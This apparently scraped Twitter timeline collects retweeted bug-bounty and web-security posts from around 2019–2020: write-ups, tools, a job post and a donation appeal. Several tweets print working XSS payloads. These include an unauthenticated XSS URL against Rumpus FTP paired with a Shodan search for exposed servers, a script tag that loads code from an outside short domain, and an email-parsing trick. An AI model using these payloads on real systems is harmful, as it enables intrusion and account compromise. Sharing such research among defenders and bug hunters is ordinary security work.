Cosmin Retweeted
@ngalongc, @EdOverflow, and I are starting a new security blog. In our first write-up, we will discuss the impact of "SameSite by default" and how it affects web app sec. Feel free to request future topics you would like us to cover. https://blog.reconless.com/samesite-by-default/ … pic.twitter.com/5R23YmpksT
Cosmin Retweeted
I'm looking for a new role doing something AppSec/Red Team/OSINT related in Seattle or remote. My strong suit is web and mobile security, with lots of bug bounty experience. My resume and contact info are on http://bonjarber.com , DMs open as well. RT's are much appreciated.
Cosmin Retweeted
Did you know that the address '<a@b.com>c@d.com' when given to SES will send an email to a@b.com? This could lead to interesting exploit scenarios with some email parsing libraries/code https://nathandavison.com/blog/exploiting-email-address-parsing-with-aws-ses …
Cosmin Retweeted
GGvulnz — How I hacked hundreds of companies through Google Groups -- by @0xmilan https://medium.com/@milanmagyar/ggvulnz-how-i-hacked-hundreds-of-companies-through-google-groups-b69c658c8924 … pic.twitter.com/eVA91hcjZv
Cosmin Retweeted
I have made a demo application to abuse Google Chrome cache by exploiting CORS. The code is big messy but it works. Original research was from @BitK_ Reviews are appreciated :-) https://github.com/MayurUdiniya/Chrome-CORS … #bugbounty #infosec
Cosmin Retweeted
Added: Response Grepper https://portswigger.net/bappstore/665178d3bf494019b3e8fe53a133528b …
Cosmin Retweeted
Hi all, dropping another tool today. This one is very simple, it does reverse DNS lookups as fast as possible. It's a great way of discovering domains and subdomains owned by a company when you know their IP address range(s). Check it out: https://github.com/hakluke/hakrevdns … pic.twitter.com/WZV9FQw1jH
Cosmin Retweeted
One of the scarier bugs I’ve found: with Microsoft’s go-ahead & after many hours spent, I’m excited to finally publish this writeup and PoC! https://www.allysonomalley.com/2020/01/06/saying-goodbye-to-my-favorite-5-minute-p1/ …
Cosmin Retweeted
Australia is on fire right now! What if we all donate 1 or 2 dollars? Maybe we can help save hundreds of animals in danger. To all my friends doing bug bounty, what’s one dollar? 1% of a low risk bug? https://www.wires.org.au/donate/emergency-fund … if you can’t donate, plz RT! Thanks!! pic.twitter.com/hFow0ABNKX
Cosmin Retweeted
FINALLY releasing hakrawler! A web crawler for hackers! Check out the blog post for details. https://medium.com/@hakluke/introducing-hakrawler-a-fast-web-crawler-for-hackers-ff799955f134 … pic.twitter.com/XDx2ujPQpp
Cosmin Retweeted
Microsoft Edge (And Internet Explorer) is the only browser that allows running JavaScript from a <script> without the end tag <script async src=data:,alert(1)>
-
Check out my 2019 Year In Review on @Hacker0x01: https://hackerone.com/inhibitor181/year-in-review …! #TogetherWeHitHarder
Cosmin Retweeted
Writeup of an SOP bypass on #Hackerone using a little trick learned from @BitK_! https://enumerated.wordpress.com/2019/12/24/sop-bypass-via-browser-cache/ … @Hacker0x01 #TogetherWeHitHarder #bugbounty
Cosmin Retweeted
Nice set of regex for finding secrets! https://raw.githubusercontent.com/xyele/secretx/master/patterns.json …
Cosmin Retweeted
Rumpus FTP Web File Manager has an #unauthenticated XSS at the login page. Just visit: http://example[.]com/Login?!'><svg/onload="XSS"> Anything after the character "!" will be inserted inside the HTML without encoding. #bugbounty Search on Shodan: https://beta.shodan.io/search?query=%22Server%3A+Rumpus%22 …
Cosmin Retweeted
Finally got the approval, Here are multiple Linode's access token stealing/account takeover bugs, I like the second one. Retweet if you like it. #bugbounty https://medium.com/@rootxharsh_90844/abusing-feature-to-steal-your-tokens-f15f78cebf74 …
Cosmin Retweeted
Just posted From checkra1n to Frida: iOS App Pentesting Quickstart on iOS 13 - to be followed up with a second writeup on bug I've found with these tools. https://spaceraccoon.dev/from-checkra1n-to-frida-ios-app-pentesting-quickstart-on-ios-13 …
Cosmin Retweeted
The CVE-2019-18935 is a severe insecure deserialization vulnerability affecting #Telerik UI. Understand its impact + learn to safely patch your software in this post from @noperator: https://hubs.ly/H0mf7L-0 (With thanks to @mwulftange + @bao7uo) pic.twitter.com/qHc5XoKywA
Cosmin Retweeted
Exploiting XSS with 20 characters limitation Notice that ﬀ characters is only one character but when browsers interpret it, it will be expanded as ff two characters. This opens the door to buy larger domains, in a cheaper way. <script src=//℡㏛.pw> https://jlajara.gitlab.io/posts/2019/11/30/XSS_20_characters.html?fbclid=IwAR1P8FGG_3ph7R6SI6M6EIeFPo2TBh1eEGnEdR4h-gU8rb4ptx0lEDEM9Kw … pic.twitter.com/79ptmwH24S
